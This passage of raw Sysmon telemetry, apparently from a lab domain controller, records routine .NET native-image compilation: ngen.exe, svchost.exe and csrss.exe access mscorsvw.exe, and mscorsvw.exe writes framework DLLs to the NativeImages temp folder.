13:48:06.779{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9196-6005-D002-00000000A301}2188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:06.654{59A5CD1D-9195-6005-CF02-00000000A301}4112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1010-0\System.Web.Mobile.dll2021-01-18 13:48:06.654 10341000x80000000000000007069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:07.404{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9197-6005-D502-00000000A301}808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:07.389{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9197-6005-D502-00000000A301}808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:07.389{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9197-6005-D502-00000000A301}808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:07.279{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9197-6005-D402-00000000A301}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:07.264{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9197-6005-D402-00000000A301}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:07.264{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9197-6005-D402-00000000A301}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:07.217{59A5CD1D-9197-6005-D302-00000000A301}812C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\32c-0\System.Web.Routing.dll2021-01-18 13:48:07.217 10341000x80000000000000007062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:07.201{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9197-6005-D302-00000000A301}812C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:07.186{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9197-6005-D302-00000000A301}812C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:07.186{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9197-6005-D302-00000000A301}812C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:07.123{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9197-6005-D202-00000000A301}3656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:07.108{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9197-6005-D202-00000000A301}3656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:07.108{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9197-6005-D202-00000000A301}3656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:07.061{59A5CD1D-9196-6005-D102-00000000A301}2828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b0c-0\System.Web.RegularExpressions.dll2021-01-18 13:48:07.061 10341000x80000000000000007076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:08.842{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9198-6005-D702-00000000A301}4544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:08.842{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9198-6005-D702-00000000A301}4544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:08.842{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9198-6005-D702-00000000A301}4544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:08.717{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9198-6005-D602-00000000A301}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:08.717{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9198-6005-D602-00000000A301}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:08.717{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9198-6005-D602-00000000A301}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:08.607{59A5CD1D-9197-6005-D502-00000000A301}808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\328-0\System.Windows.Controls.Ribbon.dll2021-01-18 13:48:08.607 11241100x80000000000000007077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:11.842{59A5CD1D-9198-6005-D702-00000000A301}4544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\11c0-0\System.Windows.Forms.DataVisualization.dll2021-01-18 13:48:11.842 10341000x80000000000000007101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.732{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-919C-6005-DE02-00000000A301}3816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.717{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-919C-6005-DE02-00000000A301}3816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.717{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-919C-6005-DE02-00000000A301}3816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:12.654{59A5CD1D-919C-6005-DD02-00000000A301}4744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1288-0\System.Windows.Presentation.dll2021-01-18 13:48:12.654 10341000x80000000000000007097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 